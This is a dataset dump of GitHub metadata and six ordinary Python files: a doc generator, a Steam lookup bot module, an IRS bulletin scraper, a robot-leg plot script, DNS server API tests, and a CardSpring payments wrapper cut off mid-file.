__id__
int64 17.2B
19,722B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
133
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 3
values | repo_name
stringlengths 7
73
| repo_url
stringlengths 26
92
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 12
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 61.3k
283M
⌀ | star_events_count
int64 0
47
| fork_events_count
int64 0
15
| gha_license_id
stringclasses 5
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
5.76M
⌀ | gha_stargazers_count
int32 0
82
⌀ | gha_forks_count
int32 0
25
⌀ | gha_open_issues_count
int32 0
80
⌀ | gha_language
stringclasses 5
values | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 19
187k
| src_encoding
stringclasses 4
values | language
stringclasses 1
value | is_vendor
bool 1
class | is_generated
bool 1
class | year
int64 2k
2.01k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1,881,195,680,599 |
f4a2f42eb85a115b6d32e35099ffdf5e8f037452
|
4af1479efae0d6f9a1e2ab911c1ff2d2200b9037
|
/scripts/docs.py
|
f4dfd08b5f92525bbc007b41c5ec19f78a44d3bb
|
[] |
no_license
|
PPinfor/JMTK
|
https://github.com/PPinfor/JMTK
|
bdd3f688c3d7fb65c361737475c9e9d81614d736
|
52f7690215569b3cc52b08aae9749529370b16e0
|
refs/heads/master
| 2017-12-14T09:24:12.201770 | 2013-06-13T18:38:28 | 2013-06-13T18:38:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# This script takes a "layout.graph" file and produces ReST documents for all
# chapters found within, along with an index.rst.
import sys,os,re,tempfile,subprocess, shutil
# A Source File is parsed into a sequence of fragments (of class SourceFragment).
class SourceFile:
def __init__(self, name):
self.name = name
self.lines = open(self.name).readlines()
self.linenum = 1
def _is_asm_type(self, line):
if re.match(r'\s*;;;',line):
return True
return False
def _doc_fragment(self):
docstr = []
is_asm = self._is_asm_type(self.lines[0])
while self.lines:
line = self.lines.pop(0)
if is_asm and not re.match(r'\s*;;;', line):
self.lines.insert(0, line)
break
elif not is_asm and re.search(r'(^|[^*])\*?\*/', line):
self.linenum += 1
docstr.append(
line[:line.find('*/')] )
break
docstr.append(line)
src = ''
if docstr[-1].find('}') != -1 and docstr[-1].find('@}') == -1:
src = self._embed_src(docstr[-1])
docstr[-1] = re.sub(r'{.*}', '' ,docstr[-1])
elif docstr[-1].find('{') != -1:
src = self._src()
docstr[-1] = re.sub(r'{', '', docstr[-1])
return SourceFragment(self, ''.join(docstr), src, self.linenum)
def _src(self):
src = []
while self.lines:
line = self.lines.pop(0)
if self._is_docstring(line):
self.lines.insert(0, line)
break
self.linenum += 1
src.append(line)
return ''.join(src)
def _embed_src(self, line):
m = re.search(r'{(.*),"(.*)","(.*)"}', line)
assert m
file = m.group(1)
search_from = m.group(2)
search_to = m.group(3)
if not search_to:
search_to = 'I AM A STRING THAT WILL NOT BE FOUND ANYWHERE'
ls = open(file, 'r').readlines()
srcls = []
state = 'skipping'
for l in ls:
if state == 'skipping' and l.find(search_from) != -1:
state = 'adding'
if l.find(search_to) != -1:
state = 'done'
if state != 'skipping':
srcls.append(l)
if state == 'done':
break
return ''.join(srcls)
def _is_docstring(self, line):
if re.match(r'\s*/\*\*($|[^*])', line) or \
re.match(r'\s*;;;',line):
return True
return False
def fragments(self):
return self._fragments()
def has_documentation(self):
for frag in self.fragments():
if frag.docstring:
return True
return False
def _fragments(self):
if hasattr(self, 'frags'):
return self.frags
frags = []
while self.lines:
line = self.lines[0]
if self._is_docstring(line) and line.find('#cut') != -1:
break
if self._is_docstring(line):
frag = self._doc_fragment()
else:
frag = SourceFragment(self, None, self._src(), self.linenum)
frags.append(frag)
self.frags = frags
return frags
# A source fragment is a chunk of (optional) documentation and (optional) code.
class SourceFragment:
def __init__(self, file, docstring, src, linenum):
self.file = file
self.docstring = docstring
self.src = src
self.ord = None
self.linenum = linenum
if self.docstring:
firstline = self.docstring.split('\n')[0]
match = re.search(r'#(\d+)', firstline)
if match:
self.ord = int(match.group(1))
self.docstring = re.sub(r'#\d+', '', self.docstring, 1)
if self.docstring and re.search(r'\*\s*$', self.docstring):
self.docstring = re.sub(r'\*\s*$', '', self.docstring)
def __str__(self):
ds = self.docstring if self.docstring else ''
src = self.src if self.src else ''
return "%s... (%s...)" % (ds[:16], src[:16])
def _strip_prefix(self, ds):
def _is_whitespace(l):
return re.match(r'\s*$', l)
if ds.startswith('/**'):
ds = ' ' + ds[3:]
lines = ds.split('\n')
ls = [len(re.match(r'[;/*\s]*', l).group(0))
for l in lines
if not _is_whitespace(l)]
l = min(ls)
lines = [line[l:] for line in lines]
return '\n'.join(lines)
def raw_docstring(self):
if not self.docstring:
return ''
return self._strip_prefix(self.docstring)
# A chapter comes from one or more source files, and will organise the fragments
# from each into a sensible order.
class DocumentChapter:
def __init__(self, files, node, bdir):
source_files = [SourceFile(f) for f in files]
source_fragments = []
for sf in source_files:
if sf.has_documentation():
source_fragments.extend(sf.fragments())
source_fragments = self._reorder_fragments(source_fragments)
self.node = node
preds = list(self._get_preds())
succs = list(self._get_succs())
self.rest = self._make_rest(source_fragments)
graph_name = str(node).replace(' ', '-') + '.svg'
self._render_pred_succ_graph(preds, succs, os.path.join(bdir, graph_name))
def _make_rest(self, fragments):
def indentlines(ls, n):
return [' '*n + l for l in ls]
def html(x):
return ['', '.. raw:: html', ''] + indentlines(x.splitlines(), 4) + [' ']
out = []
lastfile = ''
for frag in fragments:
if frag.src:
attrs = []
if lastfile != frag.file.name:
attrs = [":first_of_file:"]
lastfile = frag.file.name
attrs.append(':anchor:')
out += ['.. coderef:: %s' % frag.file.name] + indentlines(attrs, 4)
out += ['']
out += indentlines(frag.src.splitlines(), 4) + ['']
if frag.docstring:
out += frag.raw_docstring().splitlines()
out += html('<div class="anchor"></div>')
return '\n'.join(out)
def __str__(self):
return self.rest
def _get_preds(self):
if not self.node:
return set()
preds = set()
for e in self.node.graph.edges:
if e[1] == self.node:
preds.add(e[0])
if self.node in preds:
preds.remove(self.node)
return preds
def _get_succs(self):
if not self.node:
return set()
succs = set()
for e in self.node.graph.edges:
if e[0] == self.node:
succs.add(e[1])
if self.node in succs:
succs.remove(self.node)
return succs
def _reorder_fragments(self, frags):
ords = {}
this_ord = 0
max_ord = 0
for frag in frags:
if frag.ord:
this_ord = frag.ord
max_ord = max(max_ord, this_ord)
if this_ord not in ords:
ords[this_ord] = []
ords[this_ord].append(frag)
out = []
for i in range(0, max_ord+1):
if i in ords:
out.extend(ords[i])
return out
def _render_pred_succ_graph(self, preds, succs, outf):
def url(node):
return "./" + node.value.replace(' ', '-').lower() + '.html'
dot = ['digraph G {', 'node [shape=box fontsize=12 fontname="Droid Sans" peripheries=0 ]', 'rankdir=LR; nodesep=0.0; pad="0,0";']
dot += ['"%s" -> "%s"' % (p, self.node) for p in preds]
dot += ['"%s" -> "%s"' % (self.node, s) for s in succs]
dot += ['"%s" [href="%s" target="_parent"]' % (p, url(p)) for p in preds]
dot += ['"%s" [href="%s" target="_parent"]' % (s, url(s)) for s in succs]
dot += ['}', '']
dot = '\n'.join(dot)
tf = tempfile.NamedTemporaryFile(delete=False)
tf.write(dot)
tf.close()
subprocess.check_call(['dot', '-s34', '-Tsvg', '-o', outf, tf.name])
os.unlink(tf.name)
def _make_index_rst(g):
vs = []
for node in g.nodes.values():
vs.append(' ' + node.value.lower().replace(' ', '-'))
return """
JMTK docs
=========
Contents:
.. tocgraph::
x
.. toctree::
:maxdepth: 2
%s
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
""" % ('\n'.join(vs),)
if __name__ == '__main__':
from optparse import OptionParser
from graph import Graph
parser = OptionParser()
parser.add_option("--template", dest="template")
parser.add_option("--graph", dest="graph")
parser.add_option("--output-dir", dest="out_dir")
options, args = parser.parse_args()
if not options.out_dir:
options.out_dir = '.'
if not options.graph:
chapter = DocumentChapter(options.template, args, None, options.out_dir)
print str(chapter)
sys.exit(0)
try:
os.makedirs(options.out_dir)
except:
pass
g = Graph(options.graph)
for node in g.nodes.values():
print "DOC %s (from %s)" % (node.value, ', '.join(node.files))
chapter = DocumentChapter(node.files, node, options.out_dir)
outfilename = "%s/%s.rst" % (options.out_dir,
node.value.lower().replace(' ', '-'))
open(outfilename, 'w').write(str(chapter))
shutil.copy("doc/index.rst", "%s/index.rst" % options.out_dir)
# open("%s/index.rst" % options.out_dir, "w").write(_make_index_rst(g))
|
UTF-8
|
Python
| false | false | 2,013 |
1,563,368,139,424 |
f189c3533756e056bf0567a976432c5bcc86cd06
|
b37b84d1cc876cf4be3ae235d938a82e3f41e7c2
|
/modules/steam.py
|
17550ddbc7c50e2f5114b586883758713883b804
|
[
"EFL-2.0"
] |
permissive
|
kris545545/Code
|
https://github.com/kris545545/Code
|
fc65386c8dad7d903858307f3f22ed35dd8cab6e
|
7045f03deb172d1ef874a805c44569440030500a
|
refs/heads/master
| 2017-04-21T01:24:58.313955 | 2014-12-22T00:21:27 | 2014-12-22T00:21:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from util import web
import re
from util.hook import *
userid_re = r'.*(?:steamcommunity.com|www.steamcommunity.com)/(?:profiles|id)/([-_a-zA-Z0-9]+)/?.*'
appid_re = r'.*(?:store.steampowered.com|steamcommunity.com|steamdb.info)/app/([0-9]+)/?.*'
# Most of this file is done by manually parsing to get around having to use API keys, and as such,
# steamdb is unlikely to change their html tables much
@hook(cmds=['steam'], args=True)
def steam_user(code, input):
""" steam <id> -- find user information and worth of a Steam account/username """
user_lookup(code, input.group(2))
@hook(rule=userid_re)
def steam_user_auto(code, input):
user_lookup(code, input.group(1), showerror=False)
def user_lookup(code, id, showerror=True):
try:
data = web.text('http://steamdb.info/calculator/?player={id}¤cy=us'.format(id=id), timeout=10)
if 'This profile is private, unable to retrieve owned games.' in data:
if showerror:
code.say('{b}Unabled to retrieve info, that account is {red}private{c}!')
return
realname = re.search(r'<title>(?P<name>.*?) \xb7 .*?</title>', data).group('name')
status = re.search(
r'<td class="span2">Status</td>.*?<td>(?P<status>.*?)</td>', data).group('status')
# Basic user information
details = data.split('[list]')[1].split('[/list]')[0]
details = re.sub(r'\<\/.*?\>', '', details)
details = re.sub(r'\<.*?\>', ' {b}- ', details)
details = re.sub(r'\[.*?\]', '', details)
details = details.replace(': ', ': {b}')
url = 'http://steamcommunity.com/id/' + id
return code.say('{b}%s{b} - {green}%s{c} - %s - %s' % (web.escape(realname), status, details, url))
except:
if showerror:
code.say('{b}Unable to find user information on %s!' % id)
return
@hook(rule=appid_re)
def steam_app_auto(code, input):
try:
data = web.text('http://steamdb.info/app/%s/' % web.quote(input.group(1)), timeout=10)
output = []
output.append(
re.findall(r'<td>Name</td><td itemprop="name">(.*?)</td>', data)[0]) # Name
# Metacritic Score
score = re.findall(r'metacritic_score</td><td>(.*?)</td>', data)
if len(score) < 1:
score = '{b}N/A{b}'
else:
score = score[0]
output.append('Rating: %s/100' % score)
# Released yet?
if '<td class="span3">releasestate</td><td>prerelease</td>' in data:
output.append('{blue}Prerelease{c}')
# OS List
if '<td class="span3">oslist</td>' in data:
tmp = re.findall(
r'<tr><td class="span3">oslist</td><td>(.*?)</td></tr>', data)[0]
tmp = re.findall(r'title="(.*?)"', tmp)
output.append('OS: ' + ', '.join(tmp))
else:
output.append('OS: N/A')
# With pricing, there are a few options...
# 1. Free, 2. Cost, 3. Cost with discount
# As well, 1. Not released (May cause issues with rendering the price
# table) or 2. released
if 'isfreeapp</td><td>Yes</td>' in data:
# We know it's free!
output.append('{green}Free{c}')
elif '<table class="table table-prices">' in data:
tmp = re.findall(
r'<table class="table table-prices">.*?<tbody><tr>(.*?)</tr></tbody>', data)[0]
tmp = tmp.replace('<td>', '').split('</td>', 1)[0]
# We know it's paid... now check if discounted..
if 'price-discount' in tmp:
# We know it's discounted
initial = tmp.split(
'class="price-initial">', 1)[1].split('</span>', 1)[0]
new = tmp.split('</span>', 1)[1].split('<', 1)[0]
discount = tmp.split(
'"price-discount">', 1)[1].split('<', 1)[0]
output.append('{green}%s{c} (%s, was %s)' %
(new, discount, initial))
else:
output.append('{green}' + tmp)
output.append('http://store.steampowered.com/app/%s/' %
re.findall(r'<td class="span3">App ID</td><td>(.*?)</td>', data)[0])
# if else, it's unknown, so ignore it. Likely an issues with release
# pricing.
return str(' - {b}'.join(output).replace(': ', ': {b}'))
except:
return
|
UTF-8
|
Python
| false | false | 2,014 |
678,604,853,053 |
06a629d79b846a0e6c44daf41fe02e7a6bb6f5e7
|
bffbacdfae26435e2fc409c880a4ed86e2eff94c
|
/plugins/management/commands/load_irb.py
|
99117f2728fcec44e26690666707db95e43cc3a5
|
[] |
no_license
|
aih/USLAW
|
https://github.com/aih/USLAW
|
f991ea09d28443dc7343cf9d48d527695131cfa2
|
c30c5dfcd3b0a9d9b9a0a826f9387d6a45e263da
|
refs/heads/master
| 2021-05-27T16:08:46.429251 | 2013-10-29T20:20:00 | 2013-10-29T20:20:00 | 9,488,371 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
# Uslaw Project
try:
import re2 as re
except ImportError:
import re
from datetime import datetime
from time import strptime, mktime
import sys
import traceback
from pyquery import PyQuery as pq
from urlparse import urljoin
from django.core.management.base import BaseCommand
from django.conf import settings
from utils.shorturl import bitly_short
from utils.load_url import load_url
from utils.txt2html import texttohtml
from laws.models import InternalRevenueBulletinToc, InternalRevenueBulletin
from parserefs.autoparser import parse
from plugins.plugin_base import BasePlugin
from plugins.models import Plugin
from laws.views import target_to_section
from log.models import addlog
_PLUGIN_ID = 11
class Command(BaseCommand, BasePlugin):
help = """Load and parse IRM from http://www.irs.gov/irm/"""
sender = "IRB parser"
def process_page(self, page):
"""
Extract regulations links from page and process page
"""
_BASE_URL = "http://www.irs.gov"
new_urls = []
if settings.DEBUG:
print "Processing: %s" % page.url
print "level: %s" % page.plugin_level
data = page.page
if page.plugin_level == 0:
# at this level we just exctract links to Parts of IRB
new_urls = []
d = pq(data)
items = d.items('tr')
new_urls = []
for i in items:
#print i
html_href = i('td:first a:first').attr('href')
pdf_href = i('td:first a:last').attr('href')
if not html_href:
continue
url = "%s%s" % (_BASE_URL, html_href)
pdf_url = "%s%s" % (_BASE_URL, pdf_href)
new_urls.append([url, 1])
#new_urls.append([pdf_url, 5])
pub_date = i('td:last').text()
pub_date = strptime(pub_date, "%B %d, %Y")
pub_date = datetime.fromtimestamp(mktime(pub_date))
try:
irbtoc = InternalRevenueBulletinToc.objects.get(source_link=url)
except InternalRevenueBulletinToc.DoesNotExist:
irbtoc = InternalRevenueBulletinToc(source_link=url,
pdf_link=pdf_url,
level=0, name="",
order_id=0,
current_through=pub_date,
element_type=0)
irbtoc.save()
page.status = 1
page.save()
if page.plugin_level == 1:
# sub pages with toc
#data = data.replace(" ", " ").replace(u' ', ' ')
top_irb_toc = InternalRevenueBulletinToc.objects.get(source_link=page.url)
d = pq(data)
title = d('h3:first').text().replace(u' ', ' ')
title = ' '.join(title.split())
top_irb_toc.name = title
top_irb_toc.save()
print title
items = d.items('li')
part_id = 0
sub_part_id = 0
for i in items:
#print i.html()
#print "====" * 20
href = i('a:first').attr('href')
name = i('a:first').text().strip()
name = ' '.join(name.split())
url = urljoin(page.url, href)
print "%s -> %s" % (name, url)
if href.startswith('pt'): # new toc item
part_id += 1
irb_toc, c = InternalRevenueBulletinToc.objects.get_or_create(source_link=url,
parent=top_irb_toc,
name=name,
level=1, element_type=0)
irb_toc.order_id = part_id
irb_toc.save()
#print "New irb toc: %s" % irb_toc
#new_urls.append([url, 2]) # FIXMEE
elif href.startswith('ar') and not "#" in href: # level=2
part_id += 1
#url = urljoin(page.url, href)
sub_irb_toc, c = InternalRevenueBulletinToc.objects.get_or_create(source_link=url,
parent=irb_toc,
name=name,
level=2, element_type=1)
sub_irb_toc.order_id = part_id
sub_irb_toc.save()
#print "New sub irb toc: %s" % sub_irb_toc
new_urls.append([url, 2])
else:
if "#" not in href:
raise "Weird link, please fixme"
#if "<ul" in i.html():
# print "%" * 44
# print i.html()
# print "$" * 44
sub_part_id += 1
#url = urljoin(page.url, href)
section_id = href.split('#')[1]
sub_sub_irb_toc, c = InternalRevenueBulletinToc.objects.get_or_create(source_link=url,
parent=sub_irb_toc,
name=name,
section_id=section_id,
element_type=2)
if c:
sub_sub_irb_toc.level = 3
sub_sub_irb_toc.order_id = sub_part_id
sub_sub_irb_toc.save()
#print "New sub sub irb toc: %s" % sub_sub_irb_toc
#new_urls.append([url, 2])
check_subitems = i.items('ul li')
if "<ul" in i.html():
#print i.html()
#print ">>>" * 33
#print i.items('ul li')
for ch in check_subitems:
#print "ELEMENT:", ch.html()
#print "-" * 30
#print "-" * 30
shref = ch('a:first').attr('href')
sname = ch('a:first').text().strip()
sname = ' '.join(sname.split())
surl = urljoin(page.url, shref)
sub_part_id += 1
section_id = shref.split('#')[1]
sub_sub_irb_toc, c = InternalRevenueBulletinToc.objects.get_or_create(source_link=surl,
parent=sub_irb_toc,
name=sname,
section_id=section_id,
element_type=2)
sub_sub_irb_toc.order_id = sub_part_id
sub_sub_irb_toc.level = 4
sub_sub_irb_toc.save()
print "New sub sub irb toc: %s, LEVEL: 4" % sub_sub_irb_toc
if page.plugin_level == 2:
print "Level 2: %s" % page.url
top_irb_toc = InternalRevenueBulletinToc.objects.get(source_link=page.url)
data = data.replace('<div></div>', '') # PyQuery bug
fname = page.url.split('/')[-1].split('#')[0].split('?')[0]
data = data.replace(fname, '') # remove filename from html
top_i = top_irb_toc.parent
while top_i.parent is not None:
top_i = top_i.parent
def link_repl(mobj):
print mobj.group(1)
return "<a href='/laws/irb-redirect/?toc=%s§=%s'>" % (top_i.pk,
mobj.group(1))
data = re.sub(r'<a href="(\w+)(.*?)">', link_repl, data)
d = pq(data)
part_id = 0
subtitle = d('h3.subtitle:first').html()
irb_item = InternalRevenueBulletin.objects.get_or_create(text=subtitle,
toc=top_irb_toc,
part_id=part_id)
article = d('div.article:first').html()
part_id += 1
anchor_re = re.compile(r'<a name="(\w+)">')
for item in d.items('div.sect1'):
part_id += 1
text = item.html()
try:
anchor = anchor_re.findall(text)[0]
except IndexError:
print "Can;t found section id"
section_id = ""
sub_irb_toc = None
else:
sub_irb_toc = InternalRevenueBulletinToc.objects.get(section_id=section_id,
parent=top_irb_toc)
print "NEWDOC:", top_irb_toc.pk
irb_item = InternalRevenueBulletin.objects.get_or_create(text=article,
toc=top_irb_toc,
part_id=part_id, sub_toc=sub_irb_toc)
footnote = d('div.footnote').html()
if footnote:
part_id += 1
irb_item = InternalRevenueBulletin.objects.get_or_create(text=footnote,
toc=top_irb_toc,
part_id=part_id)
#page.status = 1
#page.save()
#print new_urls
return new_urls
def handle(self, *args, **options):
_START_URLS = ["http://www.irs.gov/irb/",]
self.run(_START_URLS, _PLUGIN_ID)
|
UTF-8
|
Python
| false | false | 2,013 |
2,869,038,183,554 |
11df9bf424deb237ecf9488fda8211cc89eeeaaf
|
ee0ac47ec7d920f347b7b8900eba8344700e76bf
|
/Plot/Plot_LegRange.py
|
c2ad3cf452bb201de23e0e842adf27b366120cf6
|
[] |
no_license
|
Pieter-Jan/Thesis
|
https://github.com/Pieter-Jan/Thesis
|
bef6149439659060e277b7e26147489e30e1bae5
|
32dc2af2c263a35715f78b3f47212533f57a000c
|
refs/heads/master
| 2021-01-22T02:04:48.761973 | 2014-03-20T12:35:40 | 2014-03-20T12:35:40 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import matplotlib.pyplot as plt
import numpy
import math
import sys
sys.path.append('../Oncilla')
import OncillaKinematics as OK
import ikm as OK2
alphamin = OK.q_limits[0, 0]
alphamax = OK.q_limits[1, 0]
betamin = OK.q_limits[0, 1]
betamax = OK.q_limits[1, 1]
gammamin = OK.q_limits[0, 2]
gammamax = OK.q_limits[1, 2]
alpha = 0.0*math.pi/180.0
beta = 135.0*math.pi/180.0
gamma = 90.0*math.pi/180.0
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
plt.gca().invert_yaxis()
for alpha in numpy.arange(alphamin, alphamax, 0.01):
for beta in numpy.arange(betamin, betamax, 0.01):
X = OK.FootPositions_FromServo(alpha, beta, gamma, 1)
ax1.plot(X[1,0], X[0,0], 'ko')
ax1.set_xlabel('X')
ax1.set_ylabel('Y')
ax1.set_title('gamma = 0.0')
alpha = 0.0*math.pi/180.0
for gamma in numpy.arange(gammamin, gammamax, 0.0005):
for beta in numpy.arange(betamin, betamax, 0.01):
X = OK.FootPositions_FromServo(alpha, beta, gamma, 1)
ax2.plot(X[2,0], X[0,0], 'ko')
ax2.set_xlabel('Z')
ax2.set_ylabel('Y')
ax2.set_title('alpha = 0.0')
plt.show()
|
UTF-8
|
Python
| false | false | 2,014 |
8,804,682,993,880 |
d53cfed937700d26ca9464113c2a235062a48ead
|
437da34eec1321c86f9d42d0089304d6a650a3be
|
/test_server.py
|
8ce041ef11cf86955d0ddb6c88be398d5f4d8f30
|
[] |
no_license
|
MerlinGuy/ut_dnsaas
|
https://github.com/MerlinGuy/ut_dnsaas
|
5bf7c049a0ae597db1931bffecfbbaaf9ba22ba3
|
8a76537ce5847f28dc5351a9b41c164c09814b70
|
refs/heads/master
| 2016-09-10T15:35:50.229477 | 2014-10-24T19:26:41 | 2014-10-24T19:26:41 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__author__ = 'jeff'
from utils import *
import unittest
import os
from cfg import *
class TestServer(unittest.TestCase):
dtu = None
verbose = False
def setUp(self):
self.verbose = os.getenv('TEST_VERBOSE', False)
self.dtu = DesignateUtil(ADMIN_USER)
def tearDown(self):
self.dtu.clean_up()
""" Create Tests """
def test_create_server(self):
"""Create a valid server and check it exists"""
try:
sapi = self.dtu.get_server_api(ADMIN_USER)
server = self.dtu.create_server(sapi, '')
sapi.get({'id': server['id']})
except NotFound:
self.fail('Failed to create server')
def test_create_server_dup(self):
"""Create a duplicate server - expect failure"""
try:
sapi = self.dtu.get_server_api(ADMIN_USER)
server = self.dtu.create_server(sapi, '')
sapi.create({'name': server['name']})
self.fail('Failed - Server with duplicated name created %s ' % server.name)
except Conflict:
""" Success by failure """
def test_create_server_badcred(self):
"""Create a server using tenant credentials - expect failure"""
try:
sapi = self.dtu.get_server_api(USER1)
self.dtu.create_server(sapi, '')
self.fail('Failed - Server created with bad credentials')
except Forbidden:
""" Success by failure """
""" Update Tests """
def test_update_server(self):
"""Update a server using admin credentials"""
try:
sapi = self.dtu.get_server_api(ADMIN_USER)
server1 = self.dtu.create_server(sapi, '')
new_name = self.dtu.get_unique_name(8, ".test.com.")
options = {
'id': server1['id'],
'data_json': {'name': new_name}
}
sapi.update(options)
server2 = sapi.get({'id': server1['id']})
self.assertEqual(new_name, server2['name'], "Server update failed")
except KeyError:
self.fail('Failed to create Server')
def test_update_server_major_fail(self):
"""Update a server using admin credentials"""
try:
sapi = self.dtu.get_server_api(ADMIN_USER)
server1 = self.dtu.create_server(sapi, '')
sapi2 = self.dtu.get_server_api(ADMIN_USER)
server2 = self.dtu.create_server(sapi2, '')
options = {
'id': server2['id'],
'data_json': {'name': server1['name']}
}
sapi.update(options)
self.fail("System allowed two servers to have the same name")
except Conflict:
""" Success by Failure """
def test_update_server_badcred(self):
"""Update a server using tenant credentials - expect failure"""
try:
sapi = self.dtu.get_server_api(ADMIN_USER)
server1 = self.dtu.create_server(sapi, '')
sapi2 = self.dtu.get_server_api(USER1)
options = {
'id': server1['id'],
'data_json': {'name': self.dtu.get_unique_name(8, ".test.com.")}
}
sapi2.update(options)
self.fail("System allowed server update by non-admin")
except Forbidden:
""" Success by Failure """
""" List Tests """
def test_list_servers(self):
"""Get list of current servers"""
sapi = self.dtu.get_server_api(ADMIN_USER)
sids = []
for x in xrange(3):
server = self.dtu.create_server(sapi, '')
sids.append(server['id'])
for sid in sids:
try:
sapi.get({'id': sid})
except KeyError:
self.fail("Failed to list servers correctly - server not found")
""" Delete Tests """
def test_delete_server(self):
"""Delete a server using admin credentials"""
sapi = self.dtu.get_server_api(ADMIN_USER)
server = self.dtu.create_server(sapi, '')
options = {'id': server['id']}
sapi.delete(options)
try:
sapi.get(options)
self.fail('Failed to delete Server named %s ' % server.name)
except NotFound:
""" Success by Failure """
def test_delete_server_none(self):
"""Delete a server that does not exist - expect failure"""
try:
sapi = self.dtu.get_server_api(ADMIN_USER)
server_id = self.dtu.get_unique_name(16)
options = {'id': server_id}
sapi.delete(options)
self.fail("Delete on non-existant server not caught")
except NotFound:
""" Success by Failure """
def test_delete_server_badcred(self):
"""Delete a server using tenant credentials - expect failure"""
try:
sapi = self.dtu.get_server_api(ADMIN_USER)
server = self.dtu.create_server(sapi, '')
sapi2 = self.dtu.get_server_api(USER1)
options = {'id': server['id']}
sapi2.delete(options)
self.fail('Allowed Tenant to delete Server')
except Forbidden:
""" Success by Failure """
def get_test_suite(self):
"""
Gather all the tests from this module in a test suite.
"""
test_suite = unittest.TestSuite()
test_suite.addTest(unittest.makeSuite(TestServer))
return test_suite
def run_server_suite():
test_suite = TestServer.get_test_suite()
runner = unittest.TextTestRunner()
runner.run(test_suite)
|
UTF-8
|
Python
| false | false | 2,014 |
9,036,611,219,130 |
c9fc5352c5e1e3fb4fa94a201594cf1798d69ef6
|
6b6241eedad5f533f8ffe0c1e3651ea7fb91a8a0
|
/CardSpringActions.py
|
0297eb7ee1e04650e60e440b0120a3b2410153c4
|
[] |
no_license
|
KFishner/tivly2012
|
https://github.com/KFishner/tivly2012
|
edccac34ad4ba22b1470e9654d301fc5dd163a9e
|
be3989f18a0faf1222d85e923c6a881234facbcc
|
refs/heads/master
| 2020-05-17T21:38:29.686982 | 2012-10-06T07:01:17 | 2012-10-06T07:01:17 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Created on Jun 30, 2012
@author: bryanantigua
'''
import urllib2
import urllib
import httplib2
from web1 import settings
def authenticate():
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
top_level_url = "api.cardspring.com"
password_mgr.add_password(None, top_level_url, settings.CARDSPRING_APP_ID, settings.CARDSPRING_APP_SECRET)
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
opener.addheaders = [('Accept', 'application/json'),("Content-Type","application/x-www-form-urlencoded")]
urllib2.install_opener(opener)
def authenticateWithHttplib2():
h = httplib2.Http()
h.add_credentials(settings.CARDSPRING_APP_ID, settings.CARDSPRING_APP_SECRET)
header = {"Content-type": "application/x-www-form-urlencoded","Accept":"application/json"}
auth = {'h': h, 'header' : header}
return auth
######################################################################
##### USER ACTIONS #####
######################################################################
def createAUser(csID):
authenticate()
values = {'user_id':csID}
url = 'https://api.cardspring.com/v1/users'
data = urllib.urlencode(values)
return urllib2.urlopen(url,data)
def getAUser(csID):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/users/'+ csID)
def getUsers():
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/users')
def deleteAUser(csID):
auth = authenticateWithHttplib2()
response = auth['h'].request("https://api.cardspring.com/v1/users/"+csID, method = "DELETE", headers = auth['header'])
return response
######################################################################
##### APP ACTIONS #####
######################################################################
def deleteAnApp(businessID, appID):
auth = authenticateWithHttplib2()
response = auth['h'].request("https://api.cardspring.com/v1/businesses/"+businessID+"/apps/"+appID, method = "DELETE", headers = auth['header'])
return response
def modifyAnApp(businessID,appID, values):
auth = authenticateWithHttplib2()
data = urllib.urlencode(values)
response = auth['h'].request('https://api.cardspring.com/v1/businesses/'+businessID+'/apps/'+appID, method = "PUT",body = data, headers = auth['header'])
return response
def createAnApp(businessID,redemptionValues):
# Example of values ...
# values = {'redemption[discount_summary]':'10 Off 50','redemption[discount_description]':'Save+%2410+your+next+purchase+of+%2450+or+more+at+The+Gap',
# 'redemption[type]':'terminal_discount','redemption[min_purchase]':'5000','redemption[amount]':'1000','notification[type]':'all_payment_events',
# 'notification[min_purchase]':'5000'}
authenticate()
data = urllib.urlencode(redemptionValues)
return urllib2.urlopen('https://api.cardspring.com/v1/businesses/'+businessID+'/apps',data)
#def signUpForAllApps
def getAnApp(businessID,appID):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/businesses/'+businessID+'/apps/'+appID)
def listApps(businessID):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/businesses/'+businessID+'/apps')
#=================== SPECIFIC TO USER================================#
def getUserAppConnections(csID):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/apps')
def createUserAppConnection(csID,appID):
authenticate()
values = {'app_id':appID}
data = urllib.urlencode(values)
return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/apps',data)
def getUserAppConnection(csID,appID):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/apps'+appID)
def deleteAUserApp(csID,appID):
auth = authenticateWithHttplib2()
response = auth['h'].request('https://api.cardspring.com/v1/users/'+csID+'/apps/'+appID, method = "DELETE",headers = auth['header'])
return response
######################################################################
##### CARD ACTIONS #####
######################################################################
def deleteACard(csID,token):
auth = authenticateWithHttplib2()
response = auth['h'].request("https://api.cardspring.com/v1/users/"+csID+'/cards/'+token, method = "DELETE", headers = auth['header'])
